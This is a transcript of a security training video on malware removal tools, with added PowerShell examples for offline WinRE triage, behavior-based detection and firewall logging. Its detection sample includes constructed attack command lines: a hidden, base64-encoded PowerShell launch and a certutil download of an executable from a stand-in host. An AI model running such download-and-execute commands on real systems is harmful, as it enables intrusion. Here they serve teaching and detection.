Security professionals have many tools available to combat malware. In this video, you’ll learn about the Windows Recovery Environment (WinRE), Endpoint Detection and Response (EDR), email gateways, software firewalls, and more.
When you’re troubleshooting a malware problem, you may find that the operating system is difficult to use, or that it won’t start at all. There may also be times when you need to recover certain files from the system before wiping it completely to remove the malware.
To get access to the system in that state, you can use the Windows Recovery Environment (WinRE). WinRE boots a separate, minimal copy of Windows and gives you a command prompt with access to the installed system’s file system without loading that system, so none of its services, startup programs, or malware are running.
This is a powerful prompt. It runs with full privileges, with no UAC prompts, and can change any file on the installed system, so be very careful about what you modify here. From this command prompt you can enable or disable the installed system’s services and change what starts when the operating system boots (by editing its offline registry hives), and you can delete or rename the malware’s files directly, since nothing on the infected system is running to protect them. One caveat: if the system volume is protected with BitLocker, you will need the recovery key to unlock it before WinRE can read it.
This is one of the reasons we spend so much time in this course talking not only about the graphical Windows interface, but also about what you can do at a command prompt. From the Windows Recovery Environment we can copy files, rename them, or move them to a different part of the file system or to removable media.
We can enable or disable services or modify which applications start when Windows launches. And if you are having problems with the file system, the boot sector, or any other part of the startup process, you can troubleshoot and repair that part of the operating system from WinRE with tools such as chkdsk, bootrec, bcdedit, and sfc.
If you have the installation media you used to install Windows, you can boot from that media and start the Windows Recovery Environment from the Repair your computer option. If you’re already in Windows, you can hold down the Shift key while clicking Restart, and the system will boot into the Recovery Environment options instead of the normal desktop. The same thing from a command prompt is shutdown /r /o /t 0.
In Windows 10 you can also go to the Settings app, choose Update & Security, then Recovery, and under Advanced startup click Restart now. Windows 11 is very similar: in the Settings app, go to System, then Recovery, and under Advanced startup click Restart now.
Here’s my Windows 11 desktop. We’ll go down to the search box and type S-E-T-T-I-N, and the Settings app appears at the top of the results. Once the Settings app starts, scroll down a bit in the System page and you’ll see the option for Recovery. Click Recovery, find Advanced startup, and click the Restart now button.
A dialog box appears reminding us that we are about to restart the system. So if you have anything that you need to save, make sure you do that before clicking Restart now. Windows then goes through the standard restart process, and everything at this point looks relatively normal.
Here’s the Windows Recovery Environment for Windows 11. From here we can Continue to Windows 11, Turn off your PC, Use a device to boot from other media, or, in this case, Troubleshoot. Under Troubleshoot we can Reset this PC, which lets you keep or remove your personal files and reinstall Windows. But in this case we’re going to choose Advanced options.
Here are the options for Startup Repair, Uninstall Updates, Startup Settings, UEFI Firmware Settings, and the option we’re going to use, Command Prompt. Clicking Command Prompt puts you at an X:\ prompt inside WinRE with full access to the installed Windows volume, which usually appears as C: but may have a different letter here, so check with diskpart’s list volume before you change anything.
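As an added example (not part of the original video), here is a triage session at the WinRE command prompt: copy a user’s files off the infected volume, inspect and disable startup entries and services through the offline registry hives, then repair the boot path. The drive letters, the user name, and the SuspectSvc and SuspectUpdater names are assumptions for illustration. The tools themselves (diskpart, xcopy, reg, bootrec, bcdboot, sfc) all ship in WinRE and take the same arguments whether typed at cmd.exe or in PowerShell; the # comment lines are PowerShell syntax, so at cmd.exe type only the commands.

```powershell
# Added example, not from the original video. Typed at the WinRE Command Prompt.
# ASSUMPTIONS: offline Windows volume is C:, a USB drive for rescued files is E:,
# the user is "alice", and "SuspectSvc" / "SuspectUpdater" are hypothetical names.

# 0. Confirm drive letters first. WinRE often shifts them (the installed OS may show as D:).
#    Run: diskpart   then at DISKPART> type: list volume   and: exit

# 1. Rescue the user's files before wiping. /E copies subdirectories (including empty ones),
#    /H hidden and system files, /C continues past read errors, /I treats the target as a
#    directory, /Y suppresses overwrite prompts.
xcopy C:\Users\alice\Documents E:\rescue\Documents\ /E /H /C /I /Y

# 2. Mount the offline SYSTEM and SOFTWARE hives under temporary names.
reg load HKLM\OFF_SYSTEM C:\Windows\System32\config\SYSTEM
reg load HKLM\OFF_SOFTWARE C:\Windows\System32\config\SOFTWARE

# 3. Check which control set the installed OS boots with (Select\Current), then list its
#    services and the per-machine Run/RunOnce keys, all common persistence locations.
reg query HKLM\OFF_SYSTEM\Select /v Current
reg query HKLM\OFF_SYSTEM\ControlSet001\Services
reg query HKLM\OFF_SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\OFF_SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

# 4. Disable a suspicious service (Start=4 means Disabled) and remove a Run entry.
#    Rename the binary rather than deleting it, so it can still be analyzed later.
reg add HKLM\OFF_SYSTEM\ControlSet001\Services\SuspectSvc /v Start /t REG_DWORD /d 4 /f
reg delete HKLM\OFF_SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SuspectUpdater /f
ren C:\ProgramData\SuspectUpdater\updater.exe updater.exe.quarantined

# 5. Unload the hives so the changes are flushed to disk and the hive files are released
#    before the reboot.
reg unload HKLM\OFF_SYSTEM
reg unload HKLM\OFF_SOFTWARE

# 6. Repair the boot path and check system files against the offline installation.
#    bootrec /fixmbr and /fixboot are for BIOS/MBR systems; on UEFI systems /fixboot is
#    often denied, so rebuild the EFI boot files with bcdboot instead.
bootrec /fixmbr
bootrec /fixboot
bootrec /rebuildbcd
bcdboot C:\Windows
sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows
```

The offline hive is the key part: while the installed Windows is not running, its registry is just a pair of files, so reg load makes them editable and reg unload commits the edits. The service and Run-key edits take effect on the next normal boot.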
Over the last several years, our anti-malware and antivirus software has been evolving to make our systems more secure, while the number of threats continues to scale upward. One of these improvements is Endpoint Detection and Response software, or EDR.
This is software that can detect malicious code without relying on a signature. It performs behavioral analysis, applies machine-learning models, and monitors the processes on your system, watching things like which process launched which, what command lines were used, and what files and registry keys were touched. If it identifies activity that does not look normal, it can stop that software from running.
It also records that telemetry so you can perform a root cause analysis and determine how the software originally got onto the system. And it provides tools to respond to a threat: it can isolate the system from the network automatically, quarantine the threat it has found, and roll the system back to a previous known-good state.
This allows your users to keep operating. The systems continue to be up and running, but in the background we’re still providing security to prevent this type of malware from executing.
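As an added illustration (not part of the original video), this PowerShell function applies the kind of behavior rules an EDR uses instead of a file signature to a handful of constructed process-creation records. The field names loosely follow Sysmon event ID 1 and Security event 4688, but the records, the user names, the IP address, and the base64 payload are made up for this example.

```powershell
# Added example, not from the original video. Records below are constructed, not real telemetry.
$events = @(
    [pscustomobject]@{ Time='10:01:02'; User='alice'; Parent='explorer.exe'; Image='winword.exe';    CommandLine='winword.exe invoice.docx' }
    [pscustomobject]@{ Time='10:01:09'; User='alice'; Parent='winword.exe';  Image='powershell.exe'; CommandLine='powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Time='10:02:15'; User='bob';   Parent='explorer.exe'; Image='powershell.exe'; CommandLine='powershell.exe -File C:\scripts\backup.ps1' }
    [pscustomobject]@{ Time='10:03:40'; User='alice'; Parent='outlook.exe';  Image='cmd.exe';        CommandLine='cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/a.exe a.exe' }
)

$officeApps = 'winword.exe','excel.exe','powerpnt.exe','outlook.exe'
$shells     = 'powershell.exe','pwsh.exe','cmd.exe','wscript.exe','cscript.exe','mshta.exe'

function Test-SuspiciousProcess {
    param([Parameter(Mandatory)] $Record)
    $reasons = @()

    # Rule 1: parent/child relationship. Office applications have no business launching shells.
    if ($officeApps -contains $Record.Parent -and $shells -contains $Record.Image) {
        $reasons += "$($Record.Parent) spawned $($Record.Image)"
    }

    # Rule 2: command-line shape. Hidden windows and -EncodedCommand are rarely legitimate;
    # decode the payload (UTF-16LE base64) so the analyst sees what would have run.
    if ($Record.CommandLine -match '-w(indowstyle)?\s+hidden') { $reasons += 'hidden window' }
    if ($Record.CommandLine -match '-(e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            $reasons += "encoded command: $decoded"
        } catch { $reasons += 'encoded command (undecodable)' }
    }

    # Rule 3: living-off-the-land download, certutil or bitsadmin fetching from a URL.
    if ($Record.CommandLine -match 'certutil.*-urlcache|bitsadmin.*/transfer') {
        $reasons += 'LOLBin download'
    }

    [pscustomobject]@{
        Time       = $Record.Time
        User       = $Record.User
        Image      = $Record.Image
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

$events | ForEach-Object { Test-SuspiciousProcess -Record $_ } | Format-Table -AutoSize
```

None of these rules knows anything about a particular file hash. The second and fourth records are flagged purely on how the process was started and what its command line looks like, while bob’s scheduled backup script, which also runs PowerShell, passes. A real EDR applies hundreds of such rules over live telemetry and adds the response actions described above.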
Many organizations have a third party manage this process of monitoring for malicious software. In that case, the third-party EDR service is referred to as Managed Detection and Response, or MDR. You’ll often see MDR provided by a Managed Security Service Provider, or MSSP. They are responsible for monitoring all of your systems, and if they detect a threat, they react on your behalf.
The MSSP usually has professionals on staff who understand the intricacies of malicious software, and they can apply that knowledge across all of their customers’ systems. This allows your in-house security team to focus on other security priorities while the third party takes care of detecting and responding to malware.
EDR and MDR were created to focus on individual devices. But as we all know, today’s malware can affect more than just a single computer and often involves many different parts of the infrastructure.
To bring all of those devices and endpoints into a complete view of what’s happening on your network, we have Extended Detection and Response, or XDR. Not only are we watching individual endpoints, we’re also watching the traffic traversing the network, so we can identify malicious software at a completely different level.
XDR also collects data from all of these different points and brings it back to one central database, where we can perform correlation analysis. Now we can correlate endpoint, network, and cloud data to identify where this malicious software might be, how it moved, and how to prevent it in the future.
If you’re managing a relatively small network, or just the systems at home, you’re probably using antivirus and anti-malware software. These usually run as real-time scanners, so they are constantly watching everything you do. If you happen to download something that is deemed malicious, it will be identified immediately by the real-time scanner.
We are also seeing enhancements to a number of antivirus and anti-malware suites that let them identify malicious actions outside the scope of a signature. So if something on your system is clearly behaving maliciously, even without a known signature, your antivirus and anti-malware software can stop it in its tracks.
Email is a very popular attack vector. An attacker can send an email message designed to get someone to click on a malicious link, or attach the malicious software to the message itself.
For that reason, many organizations monitor all of their email and look for malicious attachments, links, or content in these messages. Most networks have a mail gateway that all of their mail passes through, so anything inbound from the internet to your users generally passes through a firewall and then to an internal mail gateway.
Once the mail is scanned and approved, it can be forwarded to an internal mail server and delivered to your end users. Many organizations have also moved that mail gateway into the cloud.
So now we have a cloud-based email gateway that collects information from hundreds or even thousands of different email systems, can spot malicious software more easily because it sees the same campaign hitting many customers, and can react in one centralized place.
Many organizations also enable Windows Defender Firewall or a third-party firewall on all of their endpoint devices. This personal firewall monitors all network communication in and out of the system and blocks anything that is not allowed to communicate with that endpoint.
This is especially important if malware does find a way to get installed onto the operating system. Many malware variants attempt to communicate outside of your network to a command and control server on the internet. A software-based firewall can watch for those connections and stop that communication before it leaves the endpoint. One caveat: Windows Defender Firewall allows all outbound traffic by default, so to catch this you need outbound block rules, or a default outbound block with explicit allow rules, and logging of dropped packets turned on.
Most operating systems include a software-based firewall, and it’s always a good idea to enable it and keep it running. This gives you a process that is constantly watching that host’s network communication, and if there is unexpected network traffic from malware or from any other source, the personal firewall can identify it, alert on it, and block it.
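As an added example (not part of the original video), this PowerShell enables Windows Defender Firewall on every profile with logging of dropped packets, adds an outbound block rule for one program, and then parses the firewall log for outbound drops, which is the signal that something on the host tried to reach out and was stopped. The program path and the log lines are constructed for the example; the cmdlets (Set-NetFirewallProfile, New-NetFirewallRule) are the NetSecurity module cmdlets that ship with Windows and need an elevated prompt.

```powershell
# Added example, not from the original video. Requires an elevated PowerShell prompt.
# ASSUMPTION: C:\ProgramData\SuspectUpdater\updater.exe is a hypothetical program path.

# 1. Turn the firewall on for every profile, block inbound by default, and log what is
#    dropped. The log is what lets you see a blocked C2 attempt after the fact.
$log = 'C:\Windows\System32\LogFiles\Firewall\pfirewall.log'
Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True `
    -DefaultInboundAction Block -LogBlocked True -LogFileName $log -LogMaxSizeKilobytes 32767

# 2. Outbound is allowed by default, so block the specific program explicitly.
#    (Use -DefaultOutboundAction Block in step 1 instead if you can maintain allow rules.)
New-NetFirewallRule -DisplayName 'Block SuspectUpdater outbound' -Direction Outbound `
    -Program 'C:\ProgramData\SuspectUpdater\updater.exe' -Action Block -Profile Any | Out-Null

# 3. Parse pfirewall.log lines for outbound (SEND) drops. Each line is: date time action
#    protocol src-ip dst-ip src-port dst-port size tcpflags ... path. On a real host pass
#    (Get-Content $log) as -Lines.
function Get-OutboundDrops {
    param([string[]] $Lines)
    $Lines |
        Where-Object { $_ -and -not $_.StartsWith('#') } |
        ForEach-Object {
            $f = $_ -split '\s+'
            if ($f[2] -eq 'DROP' -and $f[-1] -eq 'SEND') {
                [pscustomobject]@{ Time = $f[0] + ' ' + $f[1]; Proto = $f[3]; Src = $f[4]; Dst = $f[5]; DstPort = $f[7] }
            }
        }
}

# Constructed sample log lines in pfirewall.log format (not from a real host).
$sample = @'
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-05-01 10:03:41 DROP TCP 192.168.1.20 203.0.113.10 51234 443 52 S 1234567 0 64240 - - - SEND
2024-05-01 10:03:42 ALLOW TCP 192.168.1.20 192.168.1.1 51235 53 0 - 0 0 0 - - - SEND
2024-05-01 10:03:45 DROP TCP 198.51.100.7 192.168.1.20 44555 3389 52 S 7654321 0 64240 - - - RECEIVE
2024-05-01 10:04:01 DROP TCP 192.168.1.20 203.0.113.10 51236 443 52 S 1234568 0 64240 - - - SEND
'@ -split "`r?`n"

# Repeated outbound drops to one destination look like C2 beaconing; count them per destination.
Get-OutboundDrops -Lines $sample |
    Group-Object Dst | Sort-Object Count -Descending |
    Select-Object Name, Count
```

The inbound drop from 198.51.100.7 to port 3389 is normal background noise for an internet-exposed host and is not reported; the two outbound drops to 203.0.113.10 on port 443 are the ones worth chasing, since a host on your network initiated them.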
One type of attack that is extremely difficult to identify through electronic means is social engineering. This is one reason phishing attacks are so successful: they circumvent our technology and attack the people within the organization directly.
This is why many organizations have extensive training on phishing. They want to be sure that all of their employees know exactly what this threat looks like and how to react if they see it.
To check whether end users really do remember their training, many organizations test them by sending a simulated phishing email and seeing who clicks the links. Click-through and credential-entry rates are easy to report on, and if someone does click a link and enter their credentials, it may be time for additional training.
Security training can cover more than phishing. It can address any type of attack that might occur against your systems, and end-user training can take many different forms.
We can certainly have one-on-one training, where one person explains a security issue and how to handle it to another. Or we might have posters and signs, so anyone walking into the building sees information on how to better protect their system.
Some organizations have a message board or internal forums, which can also be a good way to inform the user community of urgent threats. This might also be included in a login message, so when somebody opens a login screen they see the message of the day and know the current IT security concerns. And most organizations have an intranet or some other centralized web service, which is a great place to store documentation and provide additional details on IT security.
Although many people will go through the process of trying to remove malware from a system, the only way to be sure you have removed all of it is to wipe the system completely and restore it from a known-good backup or a known-good image. If you do have a known-good backup, this is a very quick way to restore, especially if it’s in image form, where you can simply wipe the entire system and then restore a complete duplicate of what was there originally. Make sure the backup or image predates the infection, or you will simply restore the malware along with everything else.
Restoring from backup is a relatively fast way to get a system back up and running, but you are limited to the date of the last backup. So if the backup was made 24 hours ago, you might lose the work done in those 24 hours.
One of the slowest forms of restoration is a manual one, where you install Windows by hand and then manually install every application that user requires. The way many organizations perform this restoration instead is with an image: a predefined configuration for that system, including the operating system and all required applications, that can be copied down quickly.
Since many organizations keep their user data on a network share, wiping the local system and restoring from an image gets that system back up and running as quickly as possible without losing user data.
